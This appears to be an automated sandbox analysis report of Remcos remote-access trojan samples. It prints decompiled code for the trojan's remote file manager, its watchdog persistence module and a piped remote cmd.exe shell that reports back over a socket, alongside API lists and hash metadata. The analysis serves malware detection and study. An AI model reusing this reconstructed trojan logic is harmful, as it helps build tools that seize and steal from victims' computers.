                              							_t621 = _t620 - 0x14;
                              							_t386 = _t621;
                              							_push("[ERROR]");
                              						} else {
                              							_t190 = L00416C93( &_v204,  &_v252);
                              							_t625 = _t618 - 0x18;
                              							_t567 = "Deleted file: ";
                              							E004075C4(0x46c238, _t625, "Deleted file: ", _t585, __eflags, _t190);
                              							_t621 = _t625 - 0x14;
                              							_t386 = _t621;
                              							_push("[Info]");
                              						}
                              						E00402064(0x46c238, _t386);
                              						E004165D8(0x46c238, _t585);
                              						_t622 = _t621 + 0x30;
                              						L00401FA7();
                              						_t174 = L00401E29( &_v288, _t567, __eflags, 1);
                              						_t564 = "1";
                              						_t389 = _t174;
                              						_t175 = L00405A22("1");
                              						__eflags = _t175;
                              						if(_t175 == 0) {
                              							L40:
                              							L00401ED0();
                              							L41:
                              							L00401E54( &_v284, _t564);
                              							L00401FA7();
                              							L00401FA7();
                              							return 0;
                              						} else {
                              							__eflags = E00407325( &_v272, _t389, _t389) + 1;
                              							E00407341(E00407325( &_v272, _t389, _t389) + 1);
                              							_t564 =  &_v284;
                              							L00401EDA( &_v284,  &_v284, _t592, L00402FDA(0x46c238,  &_v236,  &_v284, 0x2a));
                              							L00401ED0();
                              							E0040425F(0x46c238, _t622 - 0x18, L00401ECB( &_v288));
                              							L39:
                              							E00406176();
                              							goto L40;
                              						}
                              					}
                              					_t594 = _t592 - 1;
                              					__eflags = _t594;
                              					if(__eflags == 0) {
                              						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              						E0040425F(0x46c238,  &_v192, L00401F75(L00401E29( &_v272, _t564, __eflags, 1)));
                              						E0040730B( &_v276,  &_v252, 0, E00407325( &_v268,  &_v192,  &_v192) + 1);
                              						_t205 = L00401ECB(E0040762B( &_v240,  &_v264,  &_v216));
                              						_t207 = E00439234(L00401ECB( &_v288), _t205);
                              						asm("sbb bl, bl");
                              						L00401ED0();
                              						_t370 =  ~_t207 + 1;
                              						__eflags =  ~_t207 + 1;
                              						if(__eflags == 0) {
                              							_t564 = E004075E8( &_v204, "Unable to rename file!", __eflags, 0x46c238);
                              							E0040530D(_t370, _t618 - 0x18, _t209, _t585, __eflags, "16");
                              							_push(0x59);
                              							L00404A6E(_t370, 0x46c2e8, _t209, __eflags);
                              							L00401FA7();
                              						} else {
                              							_t564 =  &_v228;
                              							E00407516(_t618 - 0x18,  &_v228, __eflags, "*");
                              							E00406176();
                              						}
                              						L00401ED0();
                              						L13:
                              						L00401ED0();
                              						goto L40;
                              					}
                              					_t597 = _t594 - 1;
                              					__eflags = _t597;
                              					if(__eflags == 0) {
                              						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              						_t221 = L00401F75(L00401E29( &_v272, _t564, __eflags, 1));
                              						_t564 =  &_v264;
                              						CreateDirectoryW(L00401ECB(E00407516( &_v216,  &_v264, __eflags, _t221)), 0);
                              						L00401ED0();
                              						E004032E0(0x2a);
                              						E00407352(0x46c238, _t618 - 0x18,  &_v264, __eflags,  &_v268);
                              						goto L39;
                              					}
                              					_t599 = _t597 - 3;
                              					__eflags = _t597 - 3;
                              					if(__eflags == 0) {
                              						_t231 = StrToIntA(L00401F75(L00401E29( &_v264, _t564, __eflags, _t599)));
                              						_t564 = L00401F75(L00401E29( &_v268, _t564, __eflags, 1));
                              						E00417868(_t231, _t233);
                              					}
                              					goto L41;
                              				}
                              				if(_t666 == 0) {
                              					E004020B5(0x46c238,  &_v252);
                              					E00404818(0x46c238,  &_v108, 1);
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					E004049D2(_t564);
                              					_t238 = L00401E29( &_v284, _t564, __eflags, 3);
                              					_t630 = _t618 - 0xfffffffffffffff8;
                              					_t239 = L00401E29( &_v288, _t564, __eflags, 2);
                              					L00402F73(0x46c238, _t630, L00402F73(0x46c238,  &_v212, L00402F73(0x46c238,  &_v260, L00402F97( &_v236, L00401E29( &_v292, _t564, __eflags, 1), 0x46c238), __eflags, _t239), __eflags, 0x46c238), __eflags, _t238);
                              					L00404A6E(0x46c238,  &_v140, _t243, __eflags);
                              					L00401FA7();
                              					L00401FA7();
                              					L00401FA7();
                              					E0040425F(0x46c238,  &_v292, L00401F75(L00401E29( &_v324, _t243, __eflags, 0)));
                              					_t252 = L00416C93( &_v272,  &_v296);
                              					_t631 = _t630 - 0x18;
                              					E004075C4(0x46c238, _t631, "Downloading file: ", _t618 - 0x10, __eflags, _t252);
                              					_t632 = _t631 - 0x14;
                              					E00402064(0x46c238, _t632, "[Info]");
                              					E004165D8(0x46c238, "[Info]");
                              					L00401FA7();
                              					L00401ED0();
                              					_t259 = L00401F75(L00401E29( &_v336, "Downloading file: ", __eflags, 0));
                              					_t634 = _t632 + 0x30 - 0x18;
                              					E0040425F(0x46c238, _t634, _t259);
                              					_t264 = E0040628B( &_v192, __eflags, E004391B0(_t261, L00401F75(L00401E29( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                              					_t636 = _t634 + 0x2c;
                              					__eflags = _t264;
                              					if(__eflags == 0) {
                              						E0040425F(0x46c238,  &_v264, L00401F75(L00401E29( &_v296, "Downloading file: ", __eflags, 0)));
                              						_t268 = L00416C93( &_v244,  &_v268);
                              						_t564 = "Failed to download file: ";
                              						E004075C4(0x46c238, _t636 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t268);
                              						E00402064(0x46c238, _t636 - 4, "[ERROR]");
                              						E004165D8(0x46c238, "[Info]");
                              						L00401FA7();
                              						L00401ED0();
                              					} else {
                              						E004075C4(0x46c238, _t636 - 0x18, "Downloaded file size: ", "[Info]", __eflags, L00416B7E(0x46c238,  &_v236, E00402469()));
                              						E00402064(0x46c238, _t636 - 4, "[DEBUG]");
                              						E004165D8(0x46c238, "[Info]");
                              						L00401FA7();
                              						E0040425F(0x46c238,  &_v268, L00401F75(L00401E29( &_v300, "Downloaded file size: ", __eflags, 0)));
                              						_t286 = L00416C93( &_v248,  &_v272);
                              						_t564 = "Downloaded file: ";
                              						E004075C4(0x46c238, _t636 - 4 + 0x30 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t286);
                              						E00402064(0x46c238, _t636 - 4 + 0x30 - 4, "[Info]");
                              						E004165D8(0x46c238, "[Info]");
                              						L00401FA7();
                              						L00401ED0();
                              						E00402064(0x46c238, _t636 - 4 + 0x30 - 4 + 0x30 - 0x18, 0x45f6ac);
                              						_push(0x58);
                              						L00404A6E(0x46c238,  &_v160, "Downloaded file: ", __eflags);
                              					}
                              					L00404DD5( &_v140);
                              					L00404DF9(0x46c238,  &_v140, 0);
                              					L15:
                              					L00401FA7();
                              					goto L41;
                              				}
                              				_t604 = _t591 - 0x61;
                              				if(_t604 == 0) {
                              					E0040425F(0x46c238, _t618 - 0x18, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              					_t297 = L00401E29( &_v272, _t564, __eflags, 2);
                              					_t298 = L00401E29( &_v276, _t564, __eflags, 1);
                              					_t564 = _t297;
                              					E0041636B(_t298, _t297);
                              					goto L41;
                              				}
                              				_t606 = _t604 - 0x26;
                              				if(_t606 == 0) {
                              					GetLogicalDriveStringsA(0x64,  &_v108);
                              					E0040208B(0x46c238,  &_v252, _t564, __eflags,  &_v108, 0x64);
                              					__eflags = E00407399( &_v260, 0x45f850, 0, 2) + 1;
                              					L00401F64(E00407399( &_v260, 0x45f850, 0, 2) + 1);
                              					E004020CC(0x46c238, _t618 - 0x18, _t564, E00407399( &_v260, 0x45f850, 0, 2) + 1,  &_v276);
                              					_t309 = E004063B9(0x46c238,  &_v256);
                              					_t564 = L00402F97( &_v208,  &_v280, 0x46c238);
                              					L00402EFD(_t618 - 0x18, _t310, _t309);
                              					_push(0x51);
                              					L00404A6E(0x46c238, 0x46c2e8, _t310, __eflags);
                              					L00401FA7();
                              					L00401FA7();
                              					goto L15;
                              				}
                              				_t608 = _t606 - 1;
                              				if(_t608 == 0) {
                              					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              					E00407352(0x46c238, _t618 - 0x18, _t564, __eflags,  &_v260);
                              					E00406176();
                              					__eflags = E00402469() - 2;
                              					_t325 = L00416C93( &_v204, E0040730B( &_v264,  &_v240, 0, E00402469() - 2));
                              					_t564 = "Browsing directory: ";
                              					E004075C4(0x46c238, _t618 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t585, E00402469() - 2, _t325);
                              					E00402064(0x46c238, _t618 - 0x18 + 0x18 - 4, "[Info]");
                              					E004165D8(0x46c238, _t585);
                              					L00401FA7();
                              					goto L13;
                              				}
                              				_t610 = _t608 - 1;
                              				if(_t610 == 0) {
                              					E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              					ShellExecuteW(0, L"open", L00401ECB( &_v260), 0, 0, 1);
                              					_t335 = L00416C93( &_v188,  &_v260);
                              					_t564 = "Executing file: ";
                              					E004075C4(0x46c238, _t618 - 0x18, "Executing file: ", _t585, __eflags, _t335);
                              					E00402064(0x46c238, _t618 - 4, "[Info]");
                              					E004165D8(0x46c238, _t585);
                              					L00401FA7();
                              					goto L40;
                              				} else {
                              					_t612 = _t610 - 1;
                              					_t671 = _t612;
                              					if(_t612 == 0) {
                              						E004072F8( &_v108);
                              						_t341 = L00401E29( &_v264, _t564, _t671, 3);
                              						_t658 = _t618 - 0x18;
                              						E004020CC(0x46c238, _t658, _t564, _t671, _t341);
                              						_t343 = L00401E29( &_v272, _t564, _t671, 2);
                              						_t659 = _t658 - 0x18;
                              						E004020CC(0x46c238, _t659, _t564, _t671, _t343);
                              						_t345 = L00401E29( &_v280, _t564, _t671, 1);
                              						_t660 = _t659 - 0x18;
                              						E004020CC(0x46c238, _t660, _t564, _t671, _t345);
                              						_push(L00401F75(L00401E29( &_v288, _t564, _t671, _t612)));
                              						_t349 = E00406455( &_v136, _t564);
                              						_push(_t612);
                              						_t672 = _t349;
                              						if(_t349 == 0) {
                              							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, __eflags)));
                              							_t353 = L00416C93( &_v208,  &_v256);
                              							_t661 = _t660 - 0x18;
                              							_t564 = "Failed to upload file: ";
                              							E004075C4(0x46c238, _t661, "Failed to upload file: ", _t585, __eflags, _t353);
                              							_t556 = _t661 - 0x14;
                              							_push("[ERROR]");
                              						} else {
                              							E0040425F(0x46c238,  &_v252, L00401F75(L00401E29( &_v368, _t564, _t672)));
                              							_t363 = L00416C93( &_v208,  &_v256);
                              							_t664 = _t660 - 0x18;
                              							_t564 = "Uploaded file: ";
                              							E004075C4(0x46c238, _t664, "Uploaded file: ", _t585, _t672, _t363);
                              							_t556 = _t664 - 0x14;
                              							_push("[Info]");
                              						}
                              						E00402064(0x46c238, _t556);
                              						E004165D8(0x46c238, _t585);
                              						L00401FA7();
                              						L00401ED0();
                              						L00407306(0x46c238,  &_v132, _t612);
                              					}
                              					goto L41;
                              				}
                              			}
                              0x00406b9b
                              0x00406baa
                              0x00406baf
                              0x00406bc0
                              0x00406bd9
                              0x00406be1
                              0x00406be9
                              0x00406bf8
                              0x00406bfd
                              0x00406c09
                              0x00000000
                              0x00406c0e
                              0x004069d7
                              0x004069da
                              0x00406b22
                              0x00406b3b
                              0x00406b49
                              0x00406b51
                              0x00406b59
                              0x00406b68
                              0x00406b6d
                              0x00406b79
                              0x00000000
                              0x004069e0
                              0x004069e0
                              0x004069e0
                              0x004069e3
                              0x004069f0
                              0x004069fb
                              0x00406a00
                              0x00406a06
                              0x00406a11
                              0x00406a16
                              0x00406a1c
                              0x00406a27
                              0x00406a2c
                              0x00406a32
                              0x00406a48
                              0x00406a50
                              0x00406a59
                              0x00406a5a
                              0x00406a5c
                              0x00406aae
                              0x00406abb
                              0x00406ac0
                              0x00406ac3
                              0x00406acb
                              0x00406ad3
                              0x00406ad5
                              0x00406a5e
                              0x00406a6f
                              0x00406a7c
                              0x00406a81
                              0x00406a84
                              0x00406a8c
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406ada
                              0x00406adf
                              0x00406aeb
                              0x00406af4
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x004069e3

                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 00406952
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B3B
                                • Part of subcall function 00406455: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
                                • Part of subcall function 0040628B: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                                • Part of subcall function 0040628B: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                                • Part of subcall function 0040628B: CloseHandle.KERNEL32(00000000), ref: 00406366
                                • Part of subcall function 0040628B: MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • GetLogicalDriveStringsA.KERNEL32 ref: 00406C26
                              • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE4
                              • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407053
                                • Part of subcall function 00406176: FindFirstFileW.KERNEL32(00000000,?), ref: 00406191
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                              • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[Info]$open
                              • API String ID: 4189642951-3341346664
                              • Opcode ID: 09d1902499010c02f79476bc2c46c0f2a592e2f515d2050452ab4878c7d29c6c
                              • Instruction ID: 825834acea58237ea27b8ef3a258c04868925692b220403c8df577372deca8be
                              • Opcode Fuzzy Hash: 09d1902499010c02f79476bc2c46c0f2a592e2f515d2050452ab4878c7d29c6c
                              • Instruction Fuzzy Hash: 43326471A143016BC604FB76C866DAF77659F91348F40093FF942671E2EE3CAA09C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E0040F4B7(void* __eflags) {
                              				char _v28;
                              				char _v36;
                              				void* _v40;
                              				char _v56;
                              				void* _v64;
                              				char _v76;
                              				char _v84;
                              				void* _v88;
                              				char _v100;
                              				char _v104;
                              				void* _v108;
                              				char _v124;
                              				char _v128;
                              				long _v132;
                              				char _v148;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t26;
                              				void* _t29;
                              				void* _t35;
                              				void* _t46;
                              				void* _t61;
                              				void* _t78;
                              				void* _t107;
                              				long _t112;
                              				long _t141;
                              				void* _t142;
                              				CHAR* _t143;
                              				void* _t145;
                              				signed int _t147;
                              				void* _t149;
                              				void* _t155;
                              
                              				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                              				_push(_t142);
                              				_t26 = GetCurrentProcessId();
                              				if(E004105A0(0x46c518, L00401F75(0x46c518), "WD", _t26) != 0) {
                              					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                              					__eflags = _t29;
                              					if(_t29 == 0) {
                              						E004020B5(0x46c518,  &_v100);
                              						E00417334(L00401ECB(0x46c500),  &_v100);
                              						L00401F4D(0x46c518,  &_v124);
                              						__eflags = L00416F6C( &_v124);
                              						if(__eflags != 0) {
                              							_t35 = E0040425F(0x46c518,  &_v76, L"\\SysWOW64");
                              							L00401EDA( &_v132, _t37, _t142, E00403010( &_v36, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
                              							L00401ED0();
                              							L00401ED0();
                              						} else {
                              							_t61 = E0040425F(0x46c518,  &_v28, L"\\system32");
                              							L00401EDA( &_v132, _t63, _t142, E00403010( &_v84, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
                              							L00401ED0();
                              							L00401ED0();
                              						}
                              						L00401ED0();
                              						E0040766E(0x46c518,  &_v124, 0, L"\\svchost.exe");
                              						_t143 = L00401F75( &_v104);
                              						_t46 = L00413ACA(L00401ECB( &_v128), _t143, 0x46bd50);
                              						_t150 = _t149 - 0x18;
                              						_t107 = _t149 - 0x18;
                              						__eflags = _t46;
                              						if(_t46 != 0) {
                              							E00402064(0x46c518, _t107, "Watchdog module activated");
                              							E00402064(0x46c518, _t150 - 0x18, "[Info]");
                              							E004165D8(0x46c518, 0);
                              							Sleep(0x7d0);
                              							_t112 =  *0x46bd58; // 0x0
                              							goto L13;
                              						}
                              						E00402064(0x46c518, _t107, "Watchdog launch failed!");
                              						E00402064(0x46c518, _t150 - 0x18, "[ERROR]");
                              						E004165D8(0x46c518, 0);
                              						CloseHandle( *0x46bd60);
                              						L00401ED0();
                              						L00401FA7();
                              						_push(3);
                              						_pop(1);
                              					} else {
                              						CloseHandle(_t29);
                              						_t155 = _t149 - 0x18;
                              						E00402064(0x46c518, _t155, "Remcos restarted by watchdog!");
                              						_t156 = _t155 - 0x18;
                              						E00402064(0x46c518, _t155 - 0x18, "[Info]");
                              						E004165D8(0x46c518, 0);
                              						E00402064(0x46c518, _t156 + 0x18, "Watchdog module activated");
                              						E00402064(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
                              						E004165D8(0x46c518, 0);
                              						CreateThread(0, 0, 0x40fae9, 0, 0, 0);
                              						_t143 = "WDH";
                              						_t78 = E00410275(L00401F75(0x46c518), _t143,  &_v148);
                              						__eflags = _t78;
                              						if(_t78 == 0) {
                              							goto L1;
                              						} else {
                              							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
                              							E004106D2(L00401F75(0x46c518), __eflags, _t143);
                              							_t112 = _v132;
                              							L13:
                              							L14();
                              							asm("int3");
                              							_push(_t143);
                              							_push(0);
                              							_t141 = _t112;
                              							L15:
                              							_t145 = OpenProcess(0x100000, 0, _t141);
                              							WaitForSingleObject(_t145, 0xffffffff);
                              							CloseHandle(_t145);
                              							__eflags =  *0x46bd4e;
                              							if(__eflags != 0) {
                              								E0040F4B7(__eflags, 0);
                              							}
                              							goto L15;
                              						}
                              						L17:
                              					}
                              				} else {
                              					L1:
                              				}
                              				return 1;
                              				goto L17;
                              			}

                              APIs
                              • GetCurrentProcessId.KERNEL32 ref: 0040F4C3
                                • Part of subcall function 004105A0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6AC), ref: 004105AE
                                • Part of subcall function 004105A0: RegSetValueExA.ADVAPI32(0045F6AC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105C9
                                • Part of subcall function 004105A0: RegCloseKey.ADVAPI32(0045F6AC,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105D4
                              • OpenMutexA.KERNEL32 ref: 0040F4FD
                              • CloseHandle.KERNEL32(00000000), ref: 0040F50C
                              • CreateThread.KERNEL32(00000000,00000000,0040FAE9,00000000,00000000,00000000), ref: 0040F562
                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040F72A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                              • String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
                              • API String ID: 3018269243-3797382479
                              • Opcode ID: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
                              • Instruction ID: 06e747cae4c44867ce0b5dbd908e93f043d73082a9d6ea5748c6826fd798d0d4
                              • Opcode Fuzzy Hash: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
                              • Instruction Fuzzy Hash: 6751ED316043006BC618FB72DD1B86F77659E90759F50083FF942731E2EE789A0986AF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E0040559D(char _a4) {
                              				long _v8;
                              				long _v12;
                              				long _v16;
                              				char _v40;
                              				char _v64;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				long _t52;
                              				void* _t56;
                              				void* _t66;
                              				void* _t70;
                              				void* _t79;
                              				CHAR* _t80;
                              				int _t98;
                              				intOrPtr* _t107;
                              				intOrPtr _t138;
                              				signed int _t146;
                              				signed int _t147;
                              				long _t151;
                              				void* _t155;
                              				intOrPtr* _t156;
                              				void* _t163;
                              				void* _t168;
                              				void* _t175;
                              
                              				_t156 = _t155 - 0x3c;
                              				_push(_t146);
                              				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
                              				_t147 = _t146 | 0xffffffff;
                              				_t98 = 0;
                              				if( *0x46dcd0 >  *((intOrPtr*)(_t138 + 4))) {
                              					L0042EA6C(0x46dcd0);
                              					_t160 =  *0x46dcd0 - _t147;
                              					if( *0x46dcd0 == _t147) {
                              						E00404818(0, 0x46dc48, 0);
                              						L0042EDF6(_t160, E00452023);
                              						 *_t156 = 0x46dcd0;
                              						L0042EA2D(_t147);
                              					}
                              				}
                              				if( *0x46dcb0 >  *((intOrPtr*)(_t138 + 4))) {
                              					L0042EA6C(0x46dcb0);
                              					_t162 =  *0x46dcb0 - _t147;
                              					if( *0x46dcb0 == _t147) {
                              						E004020B5(_t98, 0x46dcd8);
                              						L0042EDF6(_t162, E00452019);
                              						L0042EA2D(_t147, 0x46dcb0);
                              					}
                              				}
                              				_t100 =  &_v40;
                              				E004020B5(_t98,  &_v40);
                              				_t139 = 0x46c2d0;
                              				_v8 = _t98;
                              				_t163 =  *0x46bae2 - _t98; // 0x0
                              				if(_t163 != 0) {
                              					L12:
                              					_v12 = _t98;
                              					PeekNamedPipe( *0x46dcb8, _t98, _t98, _t98,  &_v12, _t98);
                              					if(_v12 <= _t98) {
                              						_t156 = _t156 - 0x18;
                              						E00402064(_t98, _t156, 0x45f6ac);
                              						_push(0x62);
                              						_t147 = L00404A6E(_t98, 0x46dc48, _t136, __eflags);
                              						goto L21;
                              					}
                              					_push(_v12);
                              					_t56 = L00438E06(_t100);
                              					_t140 = _t56;
                              					ReadFile( *0x46dcb8, _t56, _v12,  &_v16, _t98);
                              					if(_v16 <= _t98) {
                              						L19:
                              						L00438E01(_t140);
                              						_t139 = 0x46c2d0;
                              						goto L21;
                              					}
                              					if(_v8 <= _t98) {
                              						L17:
                              						E00402064(_t98,  &_v64, _t140);
                              						_t156 = _t156 - 0x18;
                              						_t107 = _t156;
                              						_push(_v16);
                              						_push(_t98);
                              						L18:
                              						E004059C7(_t98, _t107, _t136, _t172);
                              						_t147 = L00404A6E(_t98, 0x46dc48, _t136, _t172, 0x62,  &_v64);
                              						L00401FA7();
                              						goto L19;
                              					}
                              					_t66 = L00438E20(_t140, L00401F75( &_v40), _v8);
                              					_t156 = _t156 + 0xc;
                              					_t172 = _t66;
                              					if(_t66 != 0) {
                              						goto L17;
                              					}
                              					E00402064(_t98,  &_v64, _t140);
                              					_t156 = _t156 - 0x18;
                              					_t107 = _t156;
                              					_push(_v16 - _v8);
                              					_push(_v8);
                              					goto L18;
                              				} else {
                              					_t136 = "cmd.exe";
                              					_t70 = L00405A22("cmd.exe");
                              					_t164 = _t70;
                              					if(_t70 == 0) {
                              						L26:
                              						L00404DD5(0x46dc48);
                              						CloseHandle( *0x46dcb8);
                              						CloseHandle( *0x46dcd4);
                              						 *0x46bae2 = _t98;
                              						_t98 = 1;
                              						L27:
                              						L00401FA7();
                              						L00401FA7();
                              						return _t98;
                              					}
                              					E004059BE(_t98, 0x46dcd8, E0043919A(_t98, _t164, "SystemDrive"));
                              					E004059B5(_t98, 0x46dcd8, 0x46c2d0, "\\");
                              					0x46dbf0->nLength = 0xc;
                              					 *0x46dbf8 = 1;
                              					 *0x46dbf4 = _t98;
                              					if(CreatePipe(0x46dccc, 0x46dcb4, 0x46dbf0, _t98) == 0 || CreatePipe(0x46dcb8, 0x46dcd4, 0x46dbf0, _t98) == 0) {
                              						goto L27;
                              					} else {
                              						_t151 = 0x44;
                              						E00431810(0x46dc00, 0x46dc00, _t98, CreatePipe);
                              						0x46dc00->cb = _t151;
                              						 *0x46dc2c = 0x101;
                              						 *0x46dc30 = 0;
                              						 *0x46dc38 =  *0x46dccc;
                              						_t79 =  *0x46dcd4;
                              						 *0x46dc3c = _t79;
                              						 *0x46dc40 = _t79;
                              						_t80 = L00401F75(0x46dcd8);
                              						 *0x46bae2 = CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc) != 0;
                              						E004059BE(_t98, 0x46c2d0, 0x45f6ac);
                              						 *0x46bae3 = 1;
                              						E00404955(0x46dc48);
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						E004049D2("cmd.exe");
                              						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
                              						E004020CC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc),  &_a4);
                              						_push(0x93);
                              						_t100 = 0x46dc48;
                              						_t147 = L00404A6E(_t98, 0x46dc48, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc));
                              						Sleep(0x12c);
                              						_t168 =  *0x46bae2 - _t98; // 0x0
                              						if(_t168 == 0) {
                              							goto L26;
                              						}
                              						_t139 = 0x46c2d0;
                              						do {
                              							goto L12;
                              							L21:
                              							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                              							_t100 = _t139;
                              							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
                              							if(E00402469() == 0) {
                              								_v8 = _t98;
                              							} else {
                              								E004059B5(_t98, _t139, _t139, "\n");
                              								L00401F8D( &_v40, _t139);
                              								_t52 = E00402469();
                              								WriteFile( *0x46dcb4, L00401F75(_t139), _t52,  &_v8, _t98);
                              								_t100 = _t139;
                              								E004059BE(_t98, _t139, 0x45f6ac);
                              							}
                              							Sleep(0x64);
                              							_t175 =  *0x46bae3 - _t98; // 0x0
                              						} while (_t175 != 0);
                              						TerminateProcess(0x46dcbc->hProcess, _t98);
                              						CloseHandle( *0x46dcc0);
                              						CloseHandle( *0x46dcbc);
                              						goto L26;
                              					}
                              				}
                              			}
                              0x00405851
                              0x00405865
                              0x00405867
                              0x00000000
                              0x00405867
                              0x00405815
                              0x0040581a
                              0x0040581d
                              0x0040581f
                              0x00000000
                              0x00000000
                              0x00405825
                              0x00405830
                              0x00405833
                              0x00405835
                              0x00405836
                              0x00000000
                              0x0040564e
                              0x0040564e
                              0x00405655
                              0x0040565a
                              0x0040565c
                              0x00405935
                              0x0040593a
                              0x00405945
                              0x00405951
                              0x00405957
                              0x0040595d
                              0x0040595f
                              0x00405962
                              0x0040596a
                              0x00405977
                              0x00405977
                              0x00405675
                              0x00405681
                              0x0040569d
                              0x004056a7
                              0x004056b1
                              0x004056bb
                              0x00000000
                              0x004056d7
                              0x004056d9
                              0x004056e2
                              0x004056ea
                              0x004056f2
                              0x004056fc
                              0x00405711
                              0x00405716
                              0x0040571c
                              0x00405721
                              0x00405726
                              0x0040574f
                              0x00405756
                              0x00405760
                              0x00405767
                              0x00405776
                              0x00405777
                              0x00405778
                              0x00405779
                              0x00405781
                              0x00405786
                              0x0040578f
                              0x00405794
                              0x00405799
                              0x004057a5
                              0x004057a7
                              0x004057ad
                              0x004057b3
                              0x00000000
                              0x00000000
                              0x004057b9
                              0x004057be
                              0x00000000
                              0x00405897
                              0x004058a2
                              0x004058a5
                              0x004058a7
                              0x004058b3
                              0x004058f9
                              0x004058b5
                              0x004058bc
                              0x004058c5
                              0x004058d1
                              0x004058e5
                              0x004058f0
                              0x004058f2
                              0x004058f2
                              0x004058fe
                              0x00405904
                              0x00405904
                              0x00405917
                              0x00405923
                              0x0040592f
                              0x00000000
                              0x0040592f
                              0x004056bb

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004055EF
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • __Init_thread_footer.LIBCMT ref: 0040562C
                              • CreatePipe.KERNEL32(0046DCCC,0046DCB4,0046DBF0,00000000,0045F6C4,00000000), ref: 004056B7
                              • CreatePipe.KERNEL32(0046DCB8,0046DCD4,0046DBF0,00000000), ref: 004056CD
                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC00,0046DCBC), ref: 00405740
                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057A7
                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057CF
